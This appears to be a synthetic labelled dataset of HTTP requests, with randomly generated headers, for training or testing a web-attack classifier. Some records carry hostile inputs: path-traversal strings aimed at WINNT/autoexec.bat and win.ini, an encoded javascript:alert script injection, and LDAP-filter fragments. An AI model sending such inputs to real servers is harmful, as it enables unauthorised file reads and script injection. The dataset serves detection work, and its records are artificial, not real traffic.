Date: Sat, 13 Feb 10 05:23:40 GMT
ETag: W/"hJnbxoEublZENg7E"
Expect: m9iE5=hine
From: 91yr@3eph1.it
If-Modified-Since: Tue, 13 Mar 07 10:06:53 CET
If-Unmodified-Since: Wed, 07 Apr 04 13:19:25 GMT
If-Match: "8HbkwbvAQm_NFiCy"
If-None-Match: "ETqDF6zdnQeeiXCeg"
If-Range: Tue, 13 Jun 06 19:19:42 CET
Max-Forwards: 9709
MIME-Version: 6.8
Pragma: v2=aeh
Proxy-Authorization: Basic eWVzTmVldDE6U3U5c2M=
Authorization: eslIsl h9i8aIzj=isg9
Range: 40253-8,-5,08143-143
Referer: /Srgr3di/igti/nelt6m/Eligeef1/cssnsup.png
TE: deflate;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/8.6 (Machintosh; U; Mac OS X 1.8; mp-nB; rv:6.0.1) Gecko/84308437
UA-CPU: 68000
UA-Disp: 307,9074,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 361x375
Via: HTTP/0.6 www.ut3eLdfe.css, 2.9 www.eptqTUw.gif
Transfer-Encoding: identity
Upgrade: s6yoe/1.1, teu/4.0, qs88/7.4, ngfbts/8.4
Warning: 106 www.otao9u.png "uedtUhed0asbe" "Sun, 20 May 07 15:25:06 CET"
X-Forwarded-For: 102.8.0.254
X-Serial-Number: 13224
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23653
Start - Id: 45324
class: PathTransversal
GET /e3tmnsn1teUc6/Tneetee9jlEmoyp9ihe/gTliSPkbKSHA/rpeuIn/tKqe-/Ks@VWCPCWiEu083/avD/q8xNCYcmOcE/8j0eTqdVrtelnetyJnXg/is4rB8cAEo6DAloaiYeY/oblpngd.mspx?ngux=rjSjfNjILw&tiu6C4kptlno=uriqdi&x2u38z59bhhreAn=66361&anEsobhkc=j9E4 HTTP/1.1
Host: www.NReh5h0ueo.net
Connection: close
Accept: video/mpeg, text/xml;q=0.1, video/*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: max-stale=87271
Client-ip: 212.54.201.4
Cookie: a83yaty=../../../../../../WINNT/autoexec.bat
Cookie2: $Version="6"
Date: Sun, 05 Apr 09 24:45:26 UTC
ETag: "uLxITG0Xh_--WJl9sI4"
Expect: 100-continue
If-Modified-Since: Sun, 24 Aug 08 20:06:18 GMT
If-Unmodified-Since: Sat, 14 Aug 04 18:41:21 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Aug 05 10:28:44 CET
Max-Forwards: 2261
Pragma: rtoltgi='eojctr'
Proxy-Authorization: Digest response="793A8bCE0CAdf24bBc6AF425F082f32a"
Authorization: Digest algorithm=fdnsa
Range: 674-
Referer: /ffad/ddbh.exe
TE: trailers,trailers
User-Agent: Mozilla/6.0 (X11; U; SunOS sun4u 0.0; we-yh; rv:8.5.4) Gecko/87324812
UA-CPU: x86
UA-Disp: 2781,460,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6710x724
Via: FTP/4.8 187.180.84.193, 0.8 40.236.26.12
Transfer-Encoding: deflate
Upgrade: rnie/5.1, Tob3to/6.1, sna9re/2.7, noa/6.3, moetu/9.8
Warning: 070 248.147.23.161:680 "AanaRtuucm" 
X-Serial-Number: 838229
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45324
Start - Id: 47710
class: XSS
GET /bEkRBuEytKD/7GCmVN6oY24hAsock_stream/wyp/0uL@htaccestmp_UxBCD/0WA_/a9Urcp1fRIR-oQimgZ/Teo05etmt5s2e8e6.css?lstkdtagsOe=insertTL&xB@IrG@3W=6377374&t6hhtptIaeE=64885045&lnd=tHpof&rnnithMekffHo=bwdw1dgL&pnignepkuzlct=Gb&eorOosIwtxtJ=%3Clink++++rel+%3D+++%22+++++stylesheet++%22++href++++%3D+++%22++++javascript%3A++%5Balert++%28%27aiutEunOT%27%29%3B%5D++++%22%3E&tEW2P=9943711&atdiVt=1select-acceptica&twenfeooReraaa=n&cswee0awe3vm=wTaeeEbjtHocb36f&S4-BdQJQJ=9a%5Crot HTTP/1.1
Host: 117.14.113.160:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-icelandic, x-mac-arabic;q=0.6
Accept-Encoding: *
Accept-Language: lio-orHo, curiRta-eSistug;q=0.5, rre1csX-o, sw-t
Cache-Control: no-cache
Client-ip: 182.94.84.233
Cookie: arcrheeo=475627;knslh4iaTslntaa=oa7evwSuDrCde6;eno8io=851078;A_XlQ2sbQG=mStw_hFdyQj9
Cookie2: $Version="5"
Date: Thu, 27 Sep 07 24:30:46 CET
ETag: "SJrP0lOLvAUr@LC"
Expect: eAkt=es3Stmno
From: saib3@Tioc.com
If-Modified-Since: Thu, 11 Jan 07 13:05:34 UTC
If-Unmodified-Since: Mon, 13 Dec 04 11:24:05 GMT
If-Match: "uTeelEarBVxwdPWk"
If-None-Match: *
If-Range: "a4D8OMC2.e9SlXrsbi.-"
Max-Forwards: 38
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic MnphejppZTJ4aWU=
Range: 37-9480,573294-46248,0850-768
Referer: /mwe9/tWTcro1t.conf
TE: chunked,trailers,deflate;q=0.5
Trailer: Accept
User-Agent: xaugWrk http://www.Ezobltd.net
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
Via: FTP/2.4 www.oEmrmN.html, FTP/0.8 13.28.77.253
Transfer-Encoding: o8pah; ieeir=roso9a
Upgrade: Oshni/6.9, edt/9.6, HSilt/8.8, 5jtk/7.8
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47710
Start - Id: 25378
class: Valid
GET /278-NMnCZdW/n1iat_k8pPXg/nOoSZTK/ncUsBB/zIMIi6metawhereI/VqNg/ealirmixahdSe.asmx?y1isheg=084452370&tteyRtenmb=t7rwihwt&ngrencite=ndRqi&rdt=miniitss&iaoykase8l4a=803&it=miunode&iUsTaTwsox6EiPs=4pnh&ckN28VWjIviie=%3Bisj&lr=690179 HTTP/1.1
Host: www.at4b.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=925
Client-ip: 46.57.174.208
Cookie: i7rtuha=8;tifys=627;t1aia6tsst=wwPH
Cookie2: $Version="969"
Date: Fri, 16 Mar 07 16:22:59 UTC
ETag: W/"Z2pOfs9CyNAb1oA"
Expect: mcontts
From: rrhs@lfj0yeitrn.cz
If-Modified-Since: Thu, 03 Apr 08 15:08:59 UTC
If-Unmodified-Since: Sat, 10 Mar 07 03:31:59 CET
If-Match: "etzKibjKG@5x_kV7mcT"
If-None-Match: *
If-Range: Sat, 12 Mar 05 22:15:38 GMT
Max-Forwards: 464
MIME-Version: 3.9
Pragma: 94aO=tec4t
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: NTLM ZW9vcmhJbGFvczdzZXRhZWVzcW40aWVvdG51ckVuZTN3cmRld2V0OWVDZWFlbg==
Range: -4404,-1685
Referer: /r06E/tWae/GdqeKqtt/Nbiend.tar.gz
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: 1kairgha/1.7.9
UA-CPU: 68000
UA-Disp: 071,871,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 894x439
Via: FTP/4.9 126.161.32.140:5696
Transfer-Encoding: identity
Upgrade: mAfhy/1.2, miweeu/5.9, cro/2.3, escale/8.3
Warning: 912 www.oae7p.js "tows0eecop" "Sun, 06 Nov 05 24:11:34 UTC"
X-Forwarded-For: 150.249.43.63
X-Serial-Number: 1603142835100231
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25378
Start - Id: 17568
class: Valid
GET /lO/OscriptaC/Sdtp5r/essmhaOk3ajneyc/7psXU/copymetavarLdhavingd/iR8hweb8dcboraho/u.cjXgn7Z/kCUconnect@UXDV.nsf?eM=e%29mlt%26rtoeoli&Aoh.=2111001&ix7=sTfat&tnfco=pF4&ihen=%5C%5Dand&n2PJrqGV=66705046&-O6IuXF9=2004474 HTTP/1.1
Host: www.esfc.ch:0
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-2022-kr
Accept-Encoding: compress, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 90.51.253.164
Cookie: snmeAdoeg4y=9853382;ikEnlrttagYdh=632
Cookie2: $Version="13"
Date: Mon, 19 Feb 07 18:48:53 GMT
ETag: "yFsCQA0qcZwD8_Euq"
Expect: 100-continue
From: minsiah@ea4perqO.uk
If-Modified-Since: Sun, 14 Mar 10 17:29:50 GMT
If-Unmodified-Since: Sun, 20 Sep 09 23:12:05 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 248
MIME-Version: 3.0
Pragma: gwoLir='Mraae'
Proxy-Authorization: Ne0eoc jlottGkn=mmT0iei
Authorization: Basic c3Rsbzg6aGVlNWhCaHo=
Range: 22389-71,-169,-0
Referer: /riups/T04ntao/hzneEI/dedoacew.tar
TE: trailers,trailers
Trailer: Range
User-Agent: ihr8tu1wi
UA-CPU: x86
UA-Disp: 037,032,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 519x8664
Via: 9.6 www.qhhMiu.tiff, ehDeP/2.2 15.60.51.166:0020, 1.8 www.n6eEhA.css:54626
Transfer-Encoding: enwhrb
Upgrade: httos/8.2, cIe/0.7
Warning: 480 www.tc3brn.tiff "EmlS" "Mon, 08 Nov 04 17:28:58 CET"
X-Forwarded-For: 203.39.140.226
X-Serial-Number: 2432854713
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17568
Start - Id: 4167
class: Valid
PUT /iAfORu3EMXSf/aae43mlri4tVghuti/y0e/e8o0/u1JAtm4S4ti3JBf4/VXw2qBUaKRTt3D/xXqFwy/mhonrsxmfrgDrrt/Nrnrc/LA0Bf3perl/ut12sV2LTfD.mdb? HTTP/1.1
Content-Length: 55
Content-Language: onl,ruki
Content-Encoding: deflate
Content-Location: http://www.sebj.gov/tfTaert/opPft/oeLVz/8md1m/ivOolthd.txt
Content-MD5: WGlxZWlkZWFieWtza3RxZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Feb 04 11:37:20 CET
Last-Modified: Thu, 10 Nov 05 02:08:19 GMT
Host: www.riEdbiO.it:0348
Connection: f2vaaoO
Accept: video/*, audio/*;q=0.4
Accept-Charset: iso-8859-2;q=0.8, iso-8859-9;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: apmo2=rhca
Client-ip: 165.236.22.163
Cookie: Uyleqdhyhvas7t=Uplvrders
Cookie2: $Version="2"
Date: Mon, 14 Aug 06 10:21:41 GMT
ETag: W/"bwiSfMIEH@Zdw2j"
Expect: v2e8=ethed
From: Cfmatoy@rdbndch0ft.fr
If-Modified-Since: Thu, 24 Dec 09 23:18:49 CET
If-Unmodified-Since: Sun, 22 Jul 07 01:49:58 GMT
If-Match: *
If-None-Match: "Om9Yl4aJ9VUe9p4Dp"
If-Range: "d4RbXsQEJl2lVMj"
Max-Forwards: 3
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM dUg3bXQxdWl1b2VJZVFtZmlvckNibkllYXVuc2NkaHJyMDFwZQ==
Authorization: NTLM cjNsSW81ZmlpdGVzT2lvZW5hbW44bmMwdDlSb2JlaGlocw==
Range: -9,-905
Referer: http://0uewco.com/aertkEdo/lhicfan/9s975lr.png
TE: gzip,gzip;q=0.1,deflate;q=0.4
Trailer: Max-Forwards
User-Agent: rbNajerb
UA-CPU: x86
UA-Disp: 192,906,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 123x6429
Via: 5.4 150.138.240.119:225, HTTP/2.1 www.inelP.gif
Transfer-Encoding: compress
Upgrade: maaos/1.6, n6uCnT/5.4, e8Lemk/6.4, iDong/6.0
Warning: 033 www.ht6forRg.shtml "vwcfh1evolhtnobct" 
X-Forwarded-For: 182.55.25.220
X-Serial-Number: 5833814723
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TBHzG=6btiamadmin&oeesw=wBCFfXGd_&lx5on=560&yalRn=82540

End - Id: 4167
Start - Id: 8461
class: Valid
GET /expehetrowtpm/oetofnntIedoeud/5o/oCA0H2eEDFHD/mUinsertydAZcopy/swTI/l.D8GbViXXeEDCwSdJF/mGQ7.html?trat2q=i0sstire7ra2f&daowFrtG=694117711&DJOeSBQYiX=d3r&rel3oS=289484&r8oz9sbzs=3076&7twNTllh=a&noIecquTmoItme=6984&ur=ruia&ianrkgmsoOnohoi=06 HTTP/1.0
Host: 126.239.206.205
Connection: cLcReae
Accept: text/xml;q=0.4, application/rtf;q=0.8, image/*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: lny-o, t-Shei6otr;q=0.5, obhRvi-leiii
Cache-Control: min-fresh=6286
Client-ip: 235.188.204.49
Cookie: KWp0ywgetGhQecmd=1320481
Cookie2: $Version="52"
Date: Fri, 02 Oct 09 13:15:42 GMT
ETag: W/"H_axWP2L8eMuW@t72"
Expect: 100-continue
From: lraeI@n6eai.de
If-Modified-Since: Thu, 23 Jun 05 17:02:18 UTC
If-Unmodified-Since: Tue, 16 Feb 10 09:13:13 CET
If-Match: "aOpsFIEn0t1cyy15pzX"
If-None-Match: "xG7p.@VcR5OS9eO@I"
If-Range: "I8MgJsLA@ljjnonF9xar"
Max-Forwards: 92
MIME-Version: 5.1
Pragma: awvrllt5='tsehd'
Proxy-Authorization: rahe cmte4Hz=rntcz1cz
Authorization: Digest nc=f1dec510
Range: 7593-23,41-590
Referer: /oore/eatsi/nsbml8.jsp
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.0 (Machintosh; U; PPC 4.0; sl-be; rv:2.0.7) Gecko/66896457
UA-CPU: Sparc
UA-Disp: 3788,441,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3083x039
Via: 8.0 www.u5aea7.png, ftv3d/1.2 www.hujrh6d.css:88
Transfer-Encoding: gzip
Upgrade: eht/0.1, daroy/6.1, dh2hn/7.4, 6nar/5.6
Warning: 961 www.ntijm.html "estseteardr" "Thu, 20 Mar 08 23:35:03 CET"
X-Forwarded-For: 254.66.143.32
X-Serial-Number: 3858691762
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8461
Start - Id: 12056
class: Valid
GET /ruwenie/Pna_gy7/d4q2n.tiff?issrnn=11&antcroq=+%2Feo8w%27%5Cos&5xan=8036&havingrpsM1=63941&Shknwcjdniwe=tsascriptrZ+tRreplaceti&ttatlssosex=peks3&owSbilsEsoo=55&XcLaw6=acceptfvehjes66eDnA&met=miem5eiheircs&ithxatens=947655&hdr8aetOhta1buy=mslj HTTP/1.1
Host: 62.134.100.1
Connection: close
Accept: video/quicktime, image/*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 136.168.150.37
Cookie: b5id3vaayse=nSJBOhr
Cookie2: $Version="2"
Date: Fri, 20 Feb 04 22:32:47 CET
ETag: "WIlOg@PPWov@iWWMW"
Expect: eaa2eh
From: ewreI@4sdm.ch
If-Modified-Since: Fri, 28 Aug 09 08:07:23 UTC
If-Unmodified-Since: Sat, 02 May 09 08:55:45 CET
If-Match: *
If-None-Match: "OCItSB2KvDjQz3uMiJ"
If-Range: *
Max-Forwards: 82
MIME-Version: 2.2
Pragma: aogayh='ior'
Proxy-Authorization: Digest nc=BD5B8C8A
Authorization: jaon Nrae=essIeMsl
Range: 2571-
Referer: /yzme0c/rtns/pbits5a.png
TE: trailers,trailers
Trailer: TE
User-Agent: Mozilla/7.0 (X11; U; SunOS sun4u 1.4; tz-dz; rv:0.7.8) Gecko/57549048
UA-CPU: 68000
UA-Disp: 859,2266,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 165x736
Via: 2.0 www.hyui.shtml
Transfer-Encoding: gzip
Upgrade: eoPrtm/3.6, odfe/2.3, Iorla/2.0, tdlt/6.3
Warning: 337 www.ns3txq.css "cRiegpe2onof3lwdtrnr" "Sun, 27 Aug 06 07:07:45 CET"
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 21280
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12056
Start - Id: 3728
class: Valid
GET /nKxt/2mOrMPt/ueljC.tiff?eeeroiiEl8=OdLer HTTP/1.0
Host: www.ianwk.uk:80
Connection: ztrrhm
Accept: */*;q=0.4
Accept-Charset: windows-1252;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 87.85.120.176
Cookie: ulb=0hme&5Nperl\ ba7ihr wte;Iepn=ea8n]
Cookie2: $Version="8"
Date: Mon, 25 Jun 07 03:35:49 CET
ETag: W/"iM8.PijE4f7dmDjpg4I"
Expect: hMaThnb=iqaoes
From: dlmaE@W0ld.ch
If-Modified-Since: Thu, 19 Aug 04 01:14:06 GMT
If-Unmodified-Since: Mon, 16 Oct 06 11:06:43 GMT
If-Match: *
If-None-Match: *
If-Range: "Mu.y8uQjv6iLJn8H"
Max-Forwards: 799
MIME-Version: 0.4
Pragma: id8seao=p
Proxy-Authorization: Nsot sthssEoE=ooht9
Authorization: Irlntq dein60n=oh1nhz
Range: 3009-,7606-,452153-40751
Referer: /Fsstdt/Eol6o.php3
TE: trailers,trailers,gzip
Trailer: Expect
User-Agent: Mozilla/0.1 (X11; U; Linux i586 7.4; ie-if; rv:3.6.2) Gecko/25012626
UA-CPU: PowerPC
UA-Disp: 7385,2023,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0475x7705
Via: 6.6 223.110.178.161, FTP/6.3 122.150.216.25:30742
Transfer-Encoding: deflate
Upgrade: gsllay/9.9, kj6hn/8.2
Warning: 836 116.134.212.111 "a0znr0igtS" "Fri, 24 Sep 04 03:35:09 GMT"
X-Forwarded-For: 95.113.101.82
X-Serial-Number: 68867877
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3728
Start - Id: 9077
class: Valid
GET /pkuE2PT_FsZ@/raeerscu.js?betweenfryrV=%24pdiugr&rzrh5ls=8&tarebnma=116881237 HTTP/1.1
Host: www.ooeerrOv.biz
Connection: odnrloa5
Accept: audio/*, video/quicktime, video/mpeg
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 98.238.174.51
Cookie: ep=trtl;lfwx6Boo5SEsn=n$i;ca4ts6iRerio= vth1;hnedsniioeG=hneoniq;aYzoitalr=7Aeaevalhseeeup;oD=efromZk
Cookie2: $Version="4"
Date: Sat, 23 Oct 04 21:03:47 GMT
ETag: W/"3l9qrxDIQubeQZBIZ"
Expect: ieduetee=D4te
From: riunul@rssjpw.cz
If-Modified-Since: Mon, 15 Feb 10 18:21:42 GMT
If-Unmodified-Since: Tue, 14 Jun 05 06:09:04 UTC
If-Match: "8y8gIIjwLjyMqlwIk"
If-None-Match: "pN4TqxXG4xAr1Ngq"
If-Range: ".fKVG@WaBGLdiUbFU_O"
Max-Forwards: 3
MIME-Version: 3.6
Pragma: gt4tso='o'
Proxy-Authorization: NTLM ZW5pZGlub3N0YWVuYUVieW5iYmhybmNXbXdvdGJLc3NhZXM=
Authorization: NTLM aWhyY3lvYmltdGVjN3J6NWFvaWxlNW9DY2lvc2NndHVyZWVl
Range: -003877,64218-4,-17
Referer: http://chfau.fr/ooe9zcps/JrtwlxO/wtEea/nu5eLesi.gif
TE: trailers
Trailer: If-Modified-Since
User-Agent: se3r1gal (gpybgYoL; m9VWHYUj; stKHLn.Q; eppQA7IB)
UA-CPU: Sparc
UA-Disp: 6130,9479,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 010x4467
Via: HTTP/3.9 198.194.132.242, FTP/9.0 82.202.106.135
Transfer-Encoding: identity
Upgrade: nqs/6.0, nEtzdl/8.3, shoO/3.9, eystl9/7.4, wxah/2.3
Warning: 991 177.26.146.73 "etpo8OtaAfvisutud9o" "Tue, 12 Dec 06 02:41:54 UTC"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 442361
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 9077
Start - Id: 32578
class: Valid
POST /3eiistioere2fi/xZwlike0MYavinsert/nsRk/upHmYFXIWcljGa/gerncue.jpg? HTTP/1.1
Content-Length: 46
Content-Language: ts2i,thecAia,amew
Content-Encoding: gzip
Content-Location: http://www.teoc.it/Foph/lsrjE8ee/sogt9o.asp
Content-MD5: czhucWFFbE5sb1AwNW0wOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Jun 07 06:53:28 UTC
Last-Modified: Tue, 20 Apr 04 02:18:03 GMT
Host: www.n3erteaig.biz:80
Connection: keep-alive
Accept: audio/basic, audio/basic, text/*
Accept-Charset: iso-8859-5, iso-8859-7, euc-tw;q=0.3, x-mac-icelandic, windows-1250;q=0.3
Accept-Encoding: identity
Accept-Language: xw-bxodwe;q=0.8, 7oaSaDk-ehteatya;q=0.6
Cache-Control: only-if-cached
Client-ip: 92.16.221.126
Cookie: astoetnecclegny=EeO;tsrat=3 e&o%)ewsoaeiuqwtud;nd=Hkr@m;oAlUo3sc6=3972;Cihda=di6lw
Cookie2: $Version="79"
Date: Tue, 25 Jul 06 14:11:47 CET
ETag: W/"inB.6tddVAPYbR49aL"
Expect: rstRie
If-Modified-Since: Thu, 11 Jun 09 15:22:25 UTC
If-Unmodified-Since: Thu, 07 Feb 08 10:54:29 GMT
If-Match: "HKrnNRqMcsehd8a"
If-None-Match: *
If-Range: *
Max-Forwards: 7176
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: elil qeNA=drrh
Authorization: Digest uri=/ntTnn.swf
Range: -619576,782-7
Referer: /cTljvh.tar
TE: trailers,deflate;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.5 (Machintosh; U; PPC 0.7; 9e-as; rv:5.0.9) Gecko/31938198
UA-CPU: Sparc
UA-Disp: 282,0738,8
UA-OS: Mac OS X
UA-Pixels: 744x9728
Via: 3.0 www.ribo.gif, 4jnLb5/4.4 42.170.206.187:9
Transfer-Encoding: gzip
Upgrade: nnoe/1.0, egmq/7.4, 9prh/1.1, eArAyt/8.4
Warning: 745 www.mtIvtulm.png "srtneEtsd4ey0wrnwo" "Thu, 15 Sep 05 23:54:06 UTC"
X-Forwarded-For: 215.81.0.154
X-Serial-Number: 34552
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

rcigc=cS2&tPr8We=mo-u8N&uTyrqhrch6sn=rqm'<

End - Id: 32578
Start - Id: 45061
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: 10.11.141.227
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.6
Accept-Encoding: *
Accept-Language: odajE7o-Ule, Lftsi-h, sf-ohpqag3s
Cache-Control: no-cache
Client-ip: 4.109.212.12
Cookie: owoh9eebHLot=sock_streamE;EgFO9Kh1=eorAhdyn;bin_yon-t=dma00jhtva;nhegaoeh=123823892
Cookie2: $Version="628"
Date: Wed, 09 May 07 07:00:46 CET
ETag: W/"VI05iHgMeDWsSIG"
Expect: ewaf=sngi;Nedtm=ctaEaQif
From: a5eiztho@ausccrtksa.uk
If-Modified-Since: Tue, 27 Oct 09 24:15:08 UTC
If-Unmodified-Since: Thu, 23 Sep 04 06:17:32 UTC
If-Match: *
If-None-Match: "GolsfdsphwJQ-7DVhC"
If-Range: Sun, 09 Jan 05 05:47:04 CET
Max-Forwards: 52
Pragma: no-cache
Proxy-Authorization: NTLM bHRoZXRvdG1yMmw5cm1lbnlvNDVsNWFhM3NkZHVveWlp
Authorization: NTLM dDZmdGh3cmVoZXJ3eDV0ZWh0dGR4cm90dGVnRXJpZ2QzaW9idGx1ZU84aTZycnJ0
Range: 373-850
Referer: http://www.Nsrnqi.it/xhenouy.shtml
TE: trailers
Trailer: Host
User-Agent: eZtEMDrDf http://www.4hne1abE.uk
UA-CPU: 68000
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: FTP/3.0 www.es9o.html, 6.9 www.1fpntt.css, 3.8 82.93.61.138:2
Transfer-Encoding: gzip
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 514 241.201.245.243 "Aasvtsf2rhfAiuhrred" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 098890669103739278
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45061
Start - Id: 4945
class: Valid
POST /antbjkm/oTPmH/mM/l4VquM3ko18x6tbosZ/sOkaM@NZiGU9Pz8QW46/dsoheaa1eh2oauotrl/lomdtosthsh/etg8edhSgk/lOByX.mspx? HTTP/1.1
Content-Length: 223
Content-Language: siO7tvga,emr1sta,ih
Content-Encoding: compress
Content-Location: http://www.3lcjg.be/9shGffhr/ndmerw/lu3OleI/pagnrrsr.jpeg
Content-MD5: bm5od2VkdG9lZW5udHl2cg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Oct 09 09:56:02 GMT
Last-Modified: Mon, 22 Jun 09 02:57:02 CET
Host: 246.150.121.185
Connection: adtoh9
Accept: audio/*, video/mpeg, image/gif;q=0.7
Accept-Charset: x-mac-japanese, iso-8859-4, gb2312
Accept-Encoding: deflate, compress;q=0.9, identity, gzip;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 103.157.186.193
Cookie: fgw8XFRexecp=\gsreplaceautoexecorconnectgaa-or=;4nsed=lhpw hhtpassn(ea(locationda6sopt;cea4=3111464
Cookie2: $Version="35"
Date: Thu, 10 Sep 09 10:41:08 UTC
ETag: "Mmj.38E6t4GeYzLQH_KA"
Expect: 100-continue
From: tsamc1M@it8Et.ch
If-Modified-Since: Sat, 28 Aug 04 21:00:56 CET
If-Unmodified-Since: Wed, 04 Jul 07 12:49:51 GMT
If-Match: *
If-None-Match: "pcECby7RE@EpuzGE"
If-Range: Mon, 25 Apr 05 13:04:06 GMT
Max-Forwards: 9
MIME-Version: 6.5
Pragma: c=i
Proxy-Authorization: NTLM bHRsem5hb2xkMHhhbmtldGdodmNhcG54OWlwZTExbnRzbzQ=
Authorization: eesn 8pteoosh=n6ct
Range: -9,-30994,21-971
Referer: /iia1hl/rs4x5l.mdb
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/0.1 (compatible; mozHgeld3p; Linux i586; dKioVyh; mkrerAzno)
UA-CPU: Sparc
UA-Disp: 979,352,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4223x6180
Via: FTP/8.9 www.purlR.shtml:50, hluc9/1.6 www.iompcA.css
Transfer-Encoding: f5ts; afneopet=otbn
Upgrade: fFAahd/7.2, t4Oi/2.4
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 18.33.117.239
X-Serial-Number: 2881856065
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oBiHucze=u2iu&pXr&oesgueiYhtja7=7NT.@zfj0nWK&norpntrDt8=hqMery&3k5hehd=51048177&sdhnln=nCs&twNwin=ddidxhOvkHX&daibw2dwrnutIoi=7318394&dyTerSdh=678980396&ho3et2TeOaf=tstylekreplace%&hfihY8fvJ8ns=3&gy9Seettq64eeO=ereptd

End - Id: 4945
Start - Id: 39107
class: LdapInjection
PUT /sooiodm/sCjCj/YYGm4autoexec1/s1JfgRBPDWsN4zXexXu/K.@dlsUNt/e2/nlt6itwe6Le/ehpu5Q/rPUVXH/asBNTuU/ntd8tqegns3oe/tar93_cSCZvtvzS.jpeg? HTTP/1.1
Content-Length: 125
Content-Language: o7a,vrmsEak
Content-Encoding: compress
Content-Location: /tnhoaa/oloEoi/t2twln/3rsro.sh
Content-MD5: dU1kcmVjTlJjZW5saWl0eQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Jan 08 20:00:32 GMT
Last-Modified: Fri, 26 Feb 10 16:33:44 UTC
Host: 28.21.254.120
Connection: close
Accept: */*
Accept-Charset: iso-8859-8
Accept-Encoding: *;q=0.4
Accept-Language: no-axh;q=0.2
Cache-Control: max-age=0134
Cookie: unvra=atsF(Etoev6h;ahuc3iar1e=)    (  |   (im1f=oaeO2*);Kbcn6=qwget0ash
Date: Fri, 16 Jun 06 18:13:43 UTC
ETag: W/"zlylKsP_5Hg-0f14"
Expect: n8sci=pwfh
From: raspuv@ntperaoi0.com
If-Modified-Since: Fri, 11 Dec 09 03:54:19 UTC
If-Unmodified-Since: Sat, 24 Dec 05 20:44:01 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.0
Pragma: no-cache
Authorization: Digest realm
Range: 9-,-9509
Referer: /toieistn/otto6.swf
TE: deflate;q=0.1
